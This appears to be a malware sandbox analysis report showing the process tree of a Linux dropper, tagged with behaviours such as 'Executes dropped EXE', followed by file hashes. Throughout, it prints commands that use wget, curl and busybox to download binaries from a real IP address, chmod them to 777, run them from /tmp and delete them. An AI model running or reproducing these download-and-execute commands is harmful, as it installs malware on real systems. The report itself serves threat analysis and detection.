/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:900
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:903
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:904
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:906
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:909
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:910
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:912
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:915
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:916
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:918
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:922
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97